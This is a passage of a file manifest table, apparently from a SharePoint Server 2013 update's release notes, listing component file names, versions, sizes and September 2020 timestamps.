1030| 15-Sep-20| 11:36 \nevalexp.xml_14| evalsitenearingexpiry.xml| | 1030| 15-Sep-20| 11:36 \nevalrequest.xml| evalsiterequested.xml| | 363| 15-Sep-20| 11:36 \nevalrequest.xml_14| evalsiterequested.xml| | 363| 15-Sep-20| 11:36 \nemltemplatefeat.xml| feature.xml| | 518| 15-Sep-20| 11:36 \nemltemplatefeat.xml_14| feature.xml| | 518| 15-Sep-20| 11:36 \nsiteupg.xml| siteupgraded.xml| | 922| 15-Sep-20| 11:36 \nsiteupg.xml_14| siteupgraded.xml| | 922| 15-Sep-20| 11:36 \nsiteupgfailed.xml| siteupgradefailed.xml| | 807| 15-Sep-20| 11:36 \nsiteupgfailed.xml_14| siteupgradefailed.xml| | 807| 15-Sep-20| 11:36 \nupgavail.xml| upgradeavailable.xml| | 1129| 15-Sep-20| 11:36 \nupgavail.xml_14| upgradeavailable.xml| | 1129| 15-Sep-20| 11:36 \nschema.xml_events| schema.xml| | 27131| 15-Sep-20| 11:36 \nevents.xml| events.xml| | 481| 15-Sep-20| 11:36 \nfeature.xml_events| feature.xml| | 975| 15-Sep-20| 11:36 \nschema.xml_external| schema.xml| | 3389| 15-Sep-20| 11:36 \nextlist.xml| externallist.xml| | 437| 15-Sep-20| 11:36 \nfeature.xml_external| feature.xml| | 485| 15-Sep-20| 11:36 \nextsubs_schema.xml| schema.xml| | 2775| 15-Sep-20| 11:36 \nextsubs.xml| extsubs.xml| | 470| 15-Sep-20| 11:36 \nextsubs_feature.xml| feature.xml| | 1216| 15-Sep-20| 11:36 \nextsubs_listinstance.xml| listinstance.xml| | 446| 15-Sep-20| 11:36 \nschema.xml_facility| schema.xml| | 5279| 15-Sep-20| 11:36 \nfacility.xml| facilitylist.xml| | 552| 15-Sep-20| 11:36 \nfeature.xml_facility| feature.xml| | 1064| 15-Sep-20| 11:36 \nschema.xml_fcgroups| schema.xml| | 5266| 15-Sep-20| 11:36 \nfcgroups.xml| fcgroupslist.xml| | 518| 15-Sep-20| 11:36 \nfeature.xml_fcgroups| feature.xml| | 546| 15-Sep-20| 11:36 \nfeature_0003.xml| feature.xml| | 1346| 15-Sep-20| 11:36 \nfldswss.xml| fieldswss.xml| | 222599| 15-Sep-20| 11:36 \nfldswss2.xml| fieldswss2.xml| | 469| 15-Sep-20| 11:36 \nfldswss3.xml| fieldswss3.xml| | 50780| 15-Sep-20| 11:36 \nfldswss4.xml| fieldswss4.xml| | 11512| 15-Sep-20| 11:36 \nschema.xml_gantt| schema.xml| | 15783| 15-Sep-20| 11:36 \ngantttl.xml| gantttaskslist.xml| | 496| 15-Sep-20| 11:36 \nfeature.xml_gantt| feature.xml| | 475| 15-Sep-20| 11:36 \nfeature_gbwprovision.xml| feature.xml| | 710| 15-Sep-20| 11:36 \nlistinstance_gbwprovision.xml| listinstance.xml| | 816| 15-Sep-20| 11:36 \nelements.xml_gbwwebparts| elements.xml| | 596| 15-Sep-20| 11:36 \nfeature.xml_gbwwebparts| feature.xml| | 346| 15-Sep-20| 11:36 \ntimecard.dwp_gbwwebparts| timecard.dwp| | 442| 15-Sep-20| 11:36 \nwhatsnew.dwp_gbwwebparts| whatsnew.dwp| | 448| 15-Sep-20| 11:36 \nwhereabouts.dwp_gbwwebparts| whereabouts.dwp| | 445| 15-Sep-20| 11:36 \nelements.xml| elements.xml| | 1584| 15-Sep-20| 11:36 \nfeature_gettingstarted.xml| feature.xml| | 957| 15-Sep-20| 11:36 \ngettingstarted.asx| gettingstarted.aspx| | 2904| 15-Sep-20| 11:36 \nelements.xml_gsappcatsite| elements.xml| | 483| 15-Sep-20| 11:36 \nfeature.xml_gsappcatsite| feature.xml| | 769| 15-Sep-20| 11:36 \ngettingstartedwithappcatalogsite.webpart_gsappcatsite| gettingstartedwithappcatalogsite.webpart| | 915| 15-Sep-20| 11:36 \nschema.xml_gridlist| schema.xml| | 2824| 15-Sep-20| 11:36 \ngridlist.xml| gridlist.xml| | 454| 15-Sep-20| 11:36 \nfeature.xml_gridlist| feature.xml| | 477| 15-Sep-20| 11:36 \nfeature_groupwork.xml| feature.xml| | 728| 15-Sep-20| 11:36 \nlistinstance_groupwork.xml| listinstance.xml| | 962| 15-Sep-20| 11:36 \nschema.xml_helplibrary| schema.xml| | 18584| 15-Sep-20| 11:36 \nhelplibrary.xml| helplibrary.xml| | 587| 15-Sep-20| 11:36 \nfeature.xml_helplibrary| feature.xml| | 566| 15-Sep-20| 11:36 \nhelpcontenttypes| helpcontenttypes.xml| | 3976| 15-Sep-20| 11:36 \nhelpsitecolumns| helpsitecolumns.xml| | 7052| 15-Sep-20| 11:36 \nschema.xml_hierarchy| schema.xml| | 20345| 15-Sep-20| 11:36 \nhierarchyl.xml| hierarchytaskslist.xml| | 1459| 15-Sep-20| 11:36 \nfeature.xml_hierarchy| feature.xml| | 3460| 15-Sep-20| 11:36 \nschema.xml_holiday| schema.xml| | 7813| 15-Sep-20| 11:36 \nholiday.xml| holidayslist.xml| | 541| 15-Sep-20| 11:36 \nfeature.xml_holiday| feature.xml| | 1048| 15-Sep-20| 11:36 \nfeature.xml_ifedependentapps| feature.xml| | 412| 15-Sep-20| 11:36 \nschema.xml_imedic| schema.xml| | 5726| 15-Sep-20| 11:36 \nimedic.xml| imediclist.xml| | 1655| 15-Sep-20| 11:36 \nfeature.xml_imedic| feature.xml| | 894| 15-Sep-20| 11:36 \nschema.xml_issues| schema.xml| | 9760| 15-Sep-20| 11:36 \nissues.xml| issues.xml| | 446| 15-Sep-20| 11:36 \nfeature.xml_issues| feature.xml| | 466| 15-Sep-20| 11:36 \nschema.xml_links| schema.xml| | 41072| 15-Sep-20| 11:36 \nlinks.xml| links.xml| | 441| 15-Sep-20| 11:36 \nfeature.xml_links| feature.xml| | 476| 15-Sep-20| 11:36 \nschema.xml_mainlo| schema.xml| | 2006| 15-Sep-20| 11:36 \nschema.xml_mainlo_v14| schema.xml| | 2006| 15-Sep-20| 11:36 \nfeature.xml_mainlo| feature.xml| | 706| 15-Sep-20| 11:36 \nfeature.xml_mainlo_v14| feature.xml| | 706| 15-Sep-20| 11:36 \nmaintenancelogsinstance.xml_mainlo| maintenancelogsinstance.xml| | 412| 15-Sep-20| 11:36 \nmaintenancelogsinstance.xml_mainlo_v14| maintenancelogsinstance.xml| | 412| 15-Sep-20| 11:36 \nmaintenancelogstemplate.xml_mainlo| maintenancelogstemplate.xml| | 728| 15-Sep-20| 11:36 \nmaintenancelogstemplate.xml_mainlo_v14| maintenancelogstemplate.xml| | 728| 15-Sep-20| 11:36 \nfeature.xml_mbrowserredirect| feature.xml| | 418| 15-Sep-20| 11:36 \nfeature.xml_mbrowserredirectstapling| feature.xml| | 437| 15-Sep-20| 11:36 \nfeature.xml_mbrowserredirectfeaturestp| featurestapling.xml| | 637| 15-Sep-20| 11:36 \nfeature.xml_mds| feature.xml| | 520| 15-Sep-20| 11:36 \nmriddflt.xml| default.aspx| | 1270| 15-Sep-20| 11:36 \nmridelms.xml| elements.xml| | 210| 15-Sep-20| 11:36 \nmridfeat.xml| feature.xml| | 461| 15-Sep-20| 11:36 \nelements.xml_mpswebparts| elements.xml| | 583| 15-Sep-20| 11:36 \nfeature.xml_mpswebparts| feature.xml| | 469| 15-Sep-20| 11:36 \nncwfl.xml| nocodeworkflowlibrary.xml| | 1118| 15-Sep-20| 11:36 \nschema.xml_nocodepublicwf| schema.xml| | 4515| 15-Sep-20| 11:36 \nschema.xml_nocodewf| schema.xml| | 4455| 15-Sep-20| 11:36 \nfeature.xml_nocodewf| feature.xml| | 493| 15-Sep-20| 11:36 \nschema.xml_oecatalog| schema.xml| | 24259| 15-Sep-20| 11:36 \nfeature.xml_oecatalog| feature.xml| | 1840| 15-Sep-20| 11:36 \noecatalogfields.xml_oecatalog| oecatalogfields.xml| | 7204| 15-Sep-20| 11:36 \noecataloginstance.xml_oecatalog| oecataloginstance.xml| | 436| 15-Sep-20| 11:36 \noecatalogtemplate.xml_oecatalog| oecatalogtemplate.xml| | 718| 15-Sep-20| 11:36 \nfeature.xml_openinclient| feature.xml| | 435| 15-Sep-20| 11:36 \npnsubr.xml| pnsubscriberreceivers.xml| | 516| 15-Sep-20| 11:36 \npnsubs.xml| pnsubscribers.xml| | 425| 15-Sep-20| 11:36 \nschema.xml_pnsubs| schema.xml| | 1204| 15-Sep-20| 11:36 \nfeature.xml_pnsubs| feature.xml| | 883| 15-Sep-20| 11:36 \nlistinstance.xml_pnsubs| listinstance.xml| | 446| 15-Sep-20| 11:36 \npiclib.xml| picturelibrary.xml| | 473| 15-Sep-20| 11:36 \nallitems.aspx_piclib| allitems.aspx| | 3916| 15-Sep-20| 11:36 \ndispform.aspx_piclib| dispform.aspx| | 4735| 15-Sep-20| 11:36 \neditform.aspx_piclib| editform.aspx| | 4393| 15-Sep-20| 11:36 \nschema.xml| schema.xml| | 43005| 15-Sep-20| 11:36 \nselected.aspx_piclib| selected.aspx| | 3916| 15-Sep-20| 11:36 \nslidshow.aspx_piclib| slidshow.aspx| | 4133| 15-Sep-20| 11:36 \nupload.aspx_piclib| upload.aspx| | 6294| 15-Sep-20| 11:36 \nwebfldr.aspx_piclib| webfldr.aspx| | 2521| 15-Sep-20| 11:36 \nfeature.xml_piclib| feature.xml| | 864| 15-Sep-20| 11:36 \npromotedlinks.xml| promotedlinks.xml| | 495| 15-Sep-20| 11:36 \nschema.xml_promotedlinks| schema.xml| | 8219| 15-Sep-20| 11:36 \nfeature.xml_promotedlinks| feature.xml| | 497| 15-Sep-20| 11:36 \nschedule.xml| schedulelist.xml| | 526| 15-Sep-20| 11:36 \nfeature.xml_schedule| feature.xml| | 546| 15-Sep-20| 11:36 \nschema.xml_schedule| schema.xml| | 23502| 15-Sep-20| 11:36 \nfeature.xml_sharewitheveryone| feature.xml| | 622| 15-Sep-20| 11:36 \nfeature.xml_sharewitheveryonestapling| feature.xml| | 449| 15-Sep-20| 11:36 \nfeature.xml_sharewitheveryonefeaturestp| featurestapling.xml| | 215| 15-Sep-20| 11:36 \nfeature.xml_siteassets| feature.xml| | 526| 15-Sep-20| 11:36 \nfeature.xml_sitehelp| feature.xml| | 804| 15-Sep-20| 11:36 \nfeature.xml_sitenotebook| feature.xml| | 703| 15-Sep-20| 11:36 \nfeature.xml_0002| feature.xml| | 516| 15-Sep-20| 11:36 \nsitesettings.xml| sitesettings.xml| | 21358| 15-Sep-20| 11:36 \nelements.xml_sitestat| elements.xml| | 334| 15-Sep-20| 11:36 \nelements14.xml_sitestat| elements.xml| | 334| 15-Sep-20| 11:36 \nfeature.xml_sitestat| feature.xml| | 397| 15-Sep-20| 11:36 \nfeature14.xml_sitestat| feature.xml| | 397| 15-Sep-20| 11:36 \nupgfeature.xml| feature.xml| | 528| 15-Sep-20| 11:36 \nupgfeature.xml_14| feature.xml| | 528| 15-Sep-20| 11:36 \nsiteupgrade.xml| siteupgradelinks.xml| | 970| 15-Sep-20| 11:36 \nsiteupgrade.xml_14| siteupgradelinks.xml| | 970| 15-Sep-20| 11:36 \nelements.xml_suitenav| elements.xml| | 478| 15-Sep-20| 11:36 \nfeature.xml_suitenav| feature.xml| | 366| 15-Sep-20| 11:36 \nsurveys.xml| surveys.xml| | 477| 15-Sep-20| 11:36 \nfeature.xml_surveys| feature.xml| | 478| 15-Sep-20| 11:36 \nschema.xml_surveys| schema.xml| | 40244| 15-Sep-20| 11:36 \ntasks.xml| tasks.xml| | 468| 15-Sep-20| 11:36 \nfeature.xml_tasks| feature.xml| | 476| 15-Sep-20| 11:36 \nschema.xml_tasks| schema.xml| | 17465| 15-Sep-20| 11:36 \nfeature_teamcollab.xml| feature.xml| | 3223| 15-Sep-20| 11:36 \ndefault.xml_tenantadminbdc| default.xml| | 347| 15-Sep-20| 11:36 \nfeature.xml_tenantadminbdc| feature.xml| | 514| 15-Sep-20| 11:36 \nfeature.xml_tenantadminbdcstapling| feature.xml| | 443| 15-Sep-20| 11:36 \nfeature.xml_tenantadminbdcfeaturestp| featurestapling.xml| | 222| 15-Sep-20| 11:36 \ndefault.xml_tenantadminlinks| default.xml| | 3573| 15-Sep-20| 11:36 \nfeature.xml_tenantadminlinks| feature.xml| | 517| 15-Sep-20| 11:36 \ntimecard.xml| timecardlist.xml| | 8045| 15-Sep-20| 11:36 \nfeature.xml_timecard| feature.xml| | 916| 15-Sep-20| 11:36 \nschema.xml_timecard| schema.xml| | 8517| 15-Sep-20| 11:36 \nfeature.xml_excelserveredit| feature.xml| | 749| 15-Sep-20| 11:36 \nfeature.xml_excelserveredit_14| feature.xml| | 749| 15-Sep-20| 11:36 \nfeature.xml_officewebapps| feature.xml| | 752| 15-Sep-20| 11:36 \nfeature.xml_officewebapps_14| feature.xml| | 752| 15-Sep-20| 11:36 \nfeature.xml_onenoteserverviewing| feature.xml| | 752| 15-Sep-20| 11:36 \nfeature.xml_onenoteserverviewing_14| feature.xml| | 752| 15-Sep-20| 11:36 \nfeature.xml_wordserverviewing| feature.xml| | 752| 15-Sep-20| 11:36 \nfeature.xml_wordserverviewing_14| feature.xml| | 752| 15-Sep-20| 11:36 \nwbpglib.xml| webpagelibrary.xml| | 496| 15-Sep-20| 11:36 \nfeature.xml_webpagelib| feature.xml| | 478| 15-Sep-20| 11:36 \nschema.xml_webpagelib| schema.xml| | 16443| 15-Sep-20| 11:36 \nupload.aspx_webpagelib| upload.aspx| | 5911| 15-Sep-20| 11:36 \nwhatsnew.xml| whatsnewlist.xml| | 518| 15-Sep-20| 11:36 \nfeature.xml_whatsnew| feature.xml| | 521| 15-Sep-20| 11:36 \nschema.xml_whatsnew| schema.xml| | 21487| 15-Sep-20| 11:36 \nwhereabouts.xml| whereaboutslist.xml| | 1704| 15-Sep-20| 11:36 \nfeature.xml_whereabouts| feature.xml| | 1067| 15-Sep-20| 11:36 \nschema.xml_whereabouts| schema.xml| | 149506| 15-Sep-20| 11:36 \nfeature.xml_wikipagehomepage| feature.xml| | 902| 15-Sep-20| 11:36 \nfeature.xml_wikiwelcome| feature.xml| | 594| 15-Sep-20| 11:36 \nworkflowhistory.xml| workflowhistory.xml| | 489| 15-Sep-20| 11:36 \nfeature.xml_wrkflhis| feature.xml| | 482| 15-Sep-20| 11:36 \nschema.xml_wrkflhis| schema.xml| | 8019| 15-Sep-20| 11:36 \nworkflowprocess.xml| workflowprocess.xml| | 496| 15-Sep-20| 11:36 \nfeature.xml_wrkflproc| feature.xml| | 531| 15-Sep-20| 11:36 \nschema.xml_wrkflprc| schema.xml| | 629| 15-Sep-20| 11:36 \nformlib.xml| xmlformlibrary.xml| | 477| 15-Sep-20| 11:36 \nfeature.xml_xmlform| feature.xml| | 472| 15-Sep-20| 11:36 \neditdlg.htm_xmlform| editdlg.htm| | 4892| 15-Sep-20| 11:36 \nfiledlg.htm_xmlform| filedlg.htm| | 4754| 15-Sep-20| 11:36 \nrepair.aspx_xmlform| repair.aspx| | 3272| 15-Sep-20| 11:36 \nschema.xml_xmlform| schema.xml| | 20593| 15-Sep-20| 11:36 \nupload.aspx_xmlform| upload.aspx| | 5911| 15-Sep-20| 11:36 \nfgimg.png| fgimg.png| | 11776| 15-Sep-20| 11:36 \nmicrosoft.sharepoint.health.dll| microsoft.sharepoint.health.dll| 15.0.4989.1000| 109896| 15-Sep-20| 11:36 \nmicrosoft.sharepoint.identitymodel.dll| microsoft.sharepoint.identitymodel.dll| 15.0.5249.1000| 263048| 15-Sep-20| 11:36 \nadmin.dll_0001| admin.dll| 15.0.4454.1000| 18528| 15-Sep-20| 11:36 \nauthor.dll_0001| author.dll| 15.0.4454.1000| 18528| 15-Sep-20| 11:36 \nshtml.dll_0001| shtml.dll| 15.0.4454.1000| 18544| 15-Sep-20| 11:36 \njsgridcluster.png| jsgridcluster.png| | 2003| 15-Sep-20| 11:36 \nmicrosoft.online.sharepoint.dedicated.tenantadmin.dll| microsoft.online.sharepoint.dedicated.tenantadmin.dll| 15.0.4605.1000| 48832| 15-Sep-20| 11:36 \nmicrosoft.online.sharepoint.dedicated.tenantadmin.serverstub.dll| microsoft.online.sharepoint.dedicated.tenantadmin.serverstub.dll| 15.0.4535.1000| 79608| 15-Sep-20| 11:36 \nmicrosoft.sharepoint.client.dll| microsoft.sharepoint.client.dll| 15.0.5281.1000| 499096| 15-Sep-20| 10:47 \nmicrosoft.sharepoint.client.dll_0001| microsoft.sharepoint.client.dll| 15.0.5281.1000| 499096| 15-Sep-20| 10:47 \ntaps_client.dll| microsoft.sharepoint.client.dll| 15.0.5281.1000| 499096| | \nmicrosoft.sharepoint.client.phone.dll| microsoft.sharepoint.client.phone.dll| 15.0.5281.1000| 434072| 15-Sep-20| 11:35 \nmicrosoft.sharepoint.client.phone.runtime.dll| microsoft.sharepoint.client.phone.runtime.dll| 15.0.4859.1000| 206616| 15-Sep-20| 11:35 \nmicrosoft.sharepoint.client.runtime.dll| microsoft.sharepoint.client.runtime.dll| 15.0.4859.1000| 298240| 15-Sep-20| 10:47 \nmicrosoft.sharepoint.client.runtime.dll_0001| microsoft.sharepoint.client.runtime.dll| 15.0.4859.1000| 298240| 15-Sep-20| 10:47 \ntaps_client.runtime.dll| microsoft.sharepoint.client.runtime.dll| 15.0.4859.1000| 298240| | \nmicrosoft.sharepoint.client.serverruntime.dll| microsoft.sharepoint.client.serverruntime.dll| 15.0.4905.1000| 630608| 15-Sep-20| 11:36 \nmicrosoft.sharepoint.client.serverruntime.dll_0001| microsoft.sharepoint.client.serverruntime.dll| 15.0.4905.1000| 630608| 15-Sep-20| 11:36 \nmicrosoft.sharepoint.client.silverlight.dll| microsoft.sharepoint.client.silverlight.dll| 15.0.5281.1000| 433560| 15-Sep-20| 10:47 \nmicrosoft.sharepoint.client.silverlight.runtime.dll| microsoft.sharepoint.client.silverlight.runtime.dll| 15.0.4859.1000| 197424| 15-Sep-20| 10:47 \nspmintl.dll| microsoft.sharepoint.linq.codegeneration.intl.dll| 15.0.4420.1017| 17032| 15-Sep-20| 11:36 \nspldtsvc.dll| microsoft.sharepoint.linq.dataservice.dll| 15.0.4633.1000| 42720| 15-Sep-20| 11:36 \nsplinq.dll| microsoft.sharepoint.linq.dll| 15.0.4843.1000| 376032| 15-Sep-20| 11:36 \nsplinqvs.dll| microsoft.sharepoint.linq.dll| 15.0.4843.1000| 376032| 15-Sep-20| 11:36 \nsplintl.dll| microsoft.sharepoint.linq.intl.dll| 15.0.4420.1017| 26784| 15-Sep-20| 11:36 \nmicrosoft.sharepoint.serverstub.dll| microsoft.sharepoint.serverstub.dll| 15.0.5269.1000| 1420696| 15-Sep-20| 11:36 \nspnativerequestmoduledll_0001| spnativerequestmodule.dll| | 42064| 15-Sep-20| 11:36 \noffprsx.dll| offparser.dll| 15.0.5249.1000| 1489304| 15-Sep-20| 11:36 \noisimg.dll| oisimg.dll| 15.0.5085.1000| 96848| 15-Sep-20| 11:36 \nstslib.dll_0001| microsoft.sharepoint.library.dll| 15.0.4971.1000| 184576| 15-Sep-20| 11:36 \nowssvr.dll_0001| owssvr.dll| 15.0.5285.1000| 6378888| 15-Sep-20| 11:36 \nsts11plc.config| policy.11.0.microsoft.sharepoint.config| | 590| 15-Sep-20| 11:36 \nsts11plc.dll| policy.11.0.microsoft.sharepoint.dll| 15.0.4420.1017| 12456| 15-Sep-20| 11:36 \nspsec11.config| policy.11.0.microsoft.sharepoint.security.config| | 599| 15-Sep-20| 11:36 \nspsec11.dll| policy.11.0.microsoft.sharepoint.security.dll| 15.0.4420.1017| 12496| 15-Sep-20| 11:36 \nsts12plc.config| policy.12.0.microsoft.sharepoint.config| | 590| 15-Sep-20| 11:36 \nsts12plc.dll| policy.12.0.microsoft.sharepoint.dll| 15.0.4420.1017| 12456| 15-Sep-20| 11:36 \nspsec12.config| policy.12.0.microsoft.sharepoint.security.config| | 599| 15-Sep-20| 11:36 \nspsec12.dll| policy.12.0.microsoft.sharepoint.security.dll| 15.0.4420.1017| 12456| 15-Sep-20| 11:36 \nwfa12plc.config| policy.12.0.microsoft.sharepoint.workflowactions.config| | 606| 15-Sep-20| 11:36 \nwfa12plc.dll| policy.12.0.microsoft.sharepoint.workflowactions.dll| 15.0.4420.1017| 12488| 15-Sep-20| 11:36 \nwfs12plc.config| policy.12.0.microsoft.sharepoint.workflows.config| | 600| 15-Sep-20| 11:36 \nwfs12plc.dll| policy.12.0.microsoft.sharepoint.workflows.dll| 15.0.4420.1017| 12496| 15-Sep-20| 11:36 \nbusinessdata14.config| policy.14.0.microsoft.businessdata.config| | 592| 15-Sep-20| 11:36 \nbusinessdata14.dll| policy.14.0.microsoft.businessdata.dll| 15.0.4420.1017| 12464| 15-Sep-20| 11:36 \nclt14plc.config| policy.14.0.microsoft.sharepoint.client.config| | 597| 15-Sep-20| 11:36 \nclt14plc.dll| policy.14.0.microsoft.sharepoint.client.dll| 15.0.4420.1017| 12472| 15-Sep-20| 11:36 \ncltrtm14.config| policy.14.0.microsoft.sharepoint.client.runtime.config| | 605| 15-Sep-20| 11:36 \ncltrtm14.dll| policy.14.0.microsoft.sharepoint.client.runtime.dll| 15.0.4420.1017| 12488| 15-Sep-20| 11:36 \ncltsvr14.config| policy.14.0.microsoft.sharepoint.client.serverruntime.config| | 611| 15-Sep-20| 11:36 \ncltsvr14.dll| policy.14.0.microsoft.sharepoint.client.serverruntime.dll| 15.0.4420.1017| 12496| 15-Sep-20| 11:36 \nsts14plc.config| policy.14.0.microsoft.sharepoint.config| | 590| 15-Sep-20| 11:36 \nsts14plc.dll| policy.14.0.microsoft.sharepoint.dll| 15.0.4420.1017| 12472| 15-Sep-20| 11:36 \nlinq14.config| policy.14.0.microsoft.sharepoint.linq.config| | 595| 15-Sep-20| 11:36 \nlinq14.dll| policy.14.0.microsoft.sharepoint.linq.dll| 15.0.4420.1017| 12464| 15-Sep-20| 11:36 \npowshl14.config| policy.14.0.microsoft.sharepoint.powershell.config| | 601| 15-Sep-20| 11:36 \npowshl14.dll| policy.14.0.microsoft.sharepoint.powershell.dll| 15.0.4420.1017| 12480| 15-Sep-20| 11:36 \nspsec14.config| policy.14.0.microsoft.sharepoint.security.config| | 599| 15-Sep-20| 11:36 \nspsec14.dll| policy.14.0.microsoft.sharepoint.security.dll| 15.0.4420.1017| 12456| 15-Sep-20| 11:36 \nwfa14plc.config| policy.14.0.microsoft.sharepoint.workflowactions.config| | 606| 15-Sep-20| 11:36 \nwfa14plc.dll| policy.14.0.microsoft.sharepoint.workflowactions.dll| 15.0.4420.1017| 12488| 15-Sep-20| 11:36 \nwfs14plc.config| policy.14.0.microsoft.sharepoint.workflows.config| | 600| 15-Sep-20| 11:36 \nwfs14plc.dll| policy.14.0.microsoft.sharepoint.workflows.dll| 15.0.4420.1017| 12496| 15-Sep-20| 11:36 \ncmdui14.config| policy.14.0.microsoft.web.commandui.config| | 593| 15-Sep-20| 11:36 \ncmdui14.dll| policy.14.0.microsoft.web.commandui.dll| 15.0.4420.1017| 12464| 15-Sep-20| 11:36 \nformat.ps1xml| sharepointpowershell.format.ps1xml| | 61362| 15-Sep-20| 11:36 \nmicrosoft.sharepoint.powershell.dll_0001| microsoft.sharepoint.powershell.dll| 15.0.4949.1000| 993024| 15-Sep-20| 11:36 \nmicrosoft.sharepoint.powershell.intl.dll| microsoft.sharepoint.powershell.intl.dll| 15.0.4863.1000| 95488| 15-Sep-20| 11:36 \npsconsole.psc1| psconsole.psc1| | 181| 15-Sep-20| 11:36 \nsharepoint.ps1| sharepoint.ps1| | 9838| 15-Sep-20| 11:36 \nspcmdletschema.xsd| spcmdletschema.xsd| | 1114| 15-Sep-20| 11:36 \nwsscmdlet.xml| wsscmdlet.xml| | 113235| 15-Sep-20| 11:36 \ntypes.ps1xml| sharepointpowershell.types.ps1xml| | 18000| 15-Sep-20| 11:36 \npscintl.dll| microsoft.sharepoint.setupconfiguration.intl.dll| 15.0.5197.1000| 2087008| 15-Sep-20| 11:36 \npsconfig.exe| psconfig.exe| 15.0.4939.1000| 564544| 15-Sep-20| 11:36 \npsconfig.exe.config| psconfig.exe.config| | 273| 15-Sep-20| 11:36 \npsconfigui.exe| psconfigui.exe| 15.0.4939.1000| 825664| 15-Sep-20| 11:36 \npsconfigui.exe.config| psconfigui.exe.config| | 273| 15-Sep-20| 11:36 \ncore_0.rsx| core.resx| | 490005| 15-Sep-20| 11:36 \nadmincfg.xml| adminconfig.xml| | 1288| 15-Sep-20| 11:36 \nbdcservice.xml| bdcservice.xml| | 632| 15-Sep-20| 11:36 \njoinfarm.xml| joinfarm.xml| | 648| 15-Sep-20| 11:36 \nsilverlight.js_script| silverlight.js| | 7950| 15-Sep-20| 11:36 \nsts_addgallery_ooprovider| addgallery.officeonlineprovider.dll| 15.0.4420.1017| 43144| 15-Sep-20| 11:36 \naddgallery.aspx_silverlight| addgallery.aspx| | 11755| 15-Sep-20| 11:36 \ndldsln16.png| dldsln16.png| | 912| 15-Sep-20| 11:36 \ndldsln32.png| dldsln32.png| | 2612| 15-Sep-20| 11:36 \nsts_addgallery_server| microsoft.sharepoint.addgallery.server.dll| 15.0.4508.1000| 115904| 15-Sep-20| 11:36 \nsp.datetimeutil.res_0.resx| sp.datetimeutil.res.resx| | 5825| 15-Sep-20| 11:36 \nsp.datetimeutil.res_0.resx_0.scriptx| sp.datetimeutil.res.resx.scriptx| | 255| 15-Sep-20| 11:36 \nsp.jsgrid.res_0.resx| sp.jsgrid.res.resx| | 16415| 15-Sep-20| 11:36 \nsp.jsgrid.res_0.resx_0.scriptx| sp.jsgrid.res.resx.scriptx| | 249| 15-Sep-20| 11:36 \nsp.res_0.resx| sp.res.resx| | 73515| 15-Sep-20| 11:36 \nspmetal.exe| spmetal.exe| 15.0.4420.1017| 140488| 15-Sep-20| 11:36 \nsts.spuchostservice.exe| spuchostservice.exe| 15.0.4525.1000| 118040| 15-Sep-20| 11:36 \nsts.spuchostservice.exe.config| spuchostservice.exe.config| | 644| 15-Sep-20| 11:36 \nsts.spucworkerprocess.exe| spucworkerprocess.exe| 15.0.4510.1000| 46856| 15-Sep-20| 11:36 \nsts.spucworkerprocess.exe.config| spucworkerprocess.exe.config| | 654| 15-Sep-20| 11:36 \nsts.spucworkerprocessproxy.exe| spucworkerprocessproxy.exe| 15.0.4420.1017| 115440| 15-Sep-20| 11:36 \nsts.spucworkerprocessproxy.exe.config| spucworkerprocessproxy.exe.config| | 644| 15-Sep-20| 11:36 \nspusercode.dll_0001| microsoft.sharepoint.usercode.dll| 15.0.4525.1000| 26816| 15-Sep-20| 11:36 \nadmsoap.dll| admsoap.dll| 15.0.4420.1017| 15496| 15-Sep-20| 11:36 \nadmin.amx| admin.asmx| | 86| 15-Sep-20| 11:36 \nadmdisco.asx| admindisco.aspx| | 1283| 15-Sep-20| 11:36 \nadmwsdl.asx| adminwsdl.aspx| | 9474| 15-Sep-20| 11:36 \nweb.cfg_0001| web.config| | 445| 15-Sep-20| 11:36 \nstsadm.exe| stsadm.exe| 15.0.4420.1017| 350392| 15-Sep-20| 11:36 \nstsadm.exe.config| stsadm.exe.config| | 272| 15-Sep-20| 11:36 \nstscfg.exe| stscfg.exe| 15.0.4420.1017| 14944| 15-Sep-20| 11:36 \nbecwebserviceclientconfig| client.config| | 1437| 15-Sep-20| 11:36 \nsecuritytokenappsvc| appsts.svc| | 452| 15-Sep-20| 11:36 \nappwrweb.cfg| appwpresweb.config| | 1210| 15-Sep-20| 11:36 \ncloudweb.cfg| cloudweb.config| | 66416| 15-Sep-20| 11:36 \nstsomdia.dll| microsoft.sharepoint.diagnostics.dll| 15.0.4420.1017| 18080| 15-Sep-20| 11:36 \nstsom.dll| microsoft.sharepoint.dll| 15.0.5285.1000| 26871704| 16-Sep-20| 12:50 \nstsom.dll_0001| microsoft.sharepoint.dll| 15.0.5285.1000| 26871704| 16-Sep-20| 12:50 \nxlsrv.ecs.stsom.dll| microsoft.sharepoint.dll| 15.0.5285.1000| 26871704| | \nxlsrv.ecswatchdog.stsom.dll| microsoft.sharepoint.dll| 15.0.5285.1000| 26871704| | \nxlsrv.stsom.dll| microsoft.sharepoint.dll| 15.0.5285.1000| 26871704| | \nstsomdr.dll| microsoft.sharepoint.intl.dll| 15.0.5197.1000| 1260640| 15-Sep-20| 11:36 \nbdcservice.svc| bdcservice.svc| | 383| 15-Sep-20| 11:36 \nbdcwebclient.config| client.config| | 2125| 15-Sep-20| 11:36 \nbdcserviceweb.config| web.config| | 3156| 15-Sep-20| 11:36 \nsecuritytokenclientconfig| client.config| | 3448| 15-Sep-20| 11:36 \nsecuritytokenconfig| web.config| | 6235| 15-Sep-20| 11:36 \nsecuritytokensvc| securitytoken.svc| | 443| 15-Sep-20| 11:36 \nwintokcachesvc| windowstokencache.svc| | 395| 15-Sep-20| 11:36 \nsubscriptionsettingsclientconfig| client.config| | 2369| 15-Sep-20| 11:36 \nsubscriptionsettingsservicesvc| subscriptionsettings.svc| | 367| 15-Sep-20| 11:36 \nsubscriptionsettingsserviceconfig| web.config| | 2647| 15-Sep-20| 11:36 \ntopologyclientconfig| client.config| | 982| 15-Sep-20| 11:36 \ntopologyservicesvc| topology.svc| | 347| 15-Sep-20| 11:36 \ntopologyserviceconfig| web.config| | 1604| 15-Sep-20| 11:36 \nusercodeweb.cfg| web.config| | 1002| 15-Sep-20| 11:36 \nweb.cfg| web.config| | 66416| 15-Sep-20| 11:36 \nweb.cfg_0003| web.config| | 258| 15-Sep-20| 11:36 \nstsap.dll| microsoft.sharepoint.applicationpages.dll| 15.0.5271.1000| 1481616| 15-Sep-20| 11:36 \nstsomsec.dll| microsoft.sharepoint.security.dll| 15.0.4420.1017| 16512| 15-Sep-20| 10:47 \nstsomsec.dll_0001| microsoft.sharepoint.security.dll| 15.0.4420.1017| 16512| 15-Sep-20| 10:47 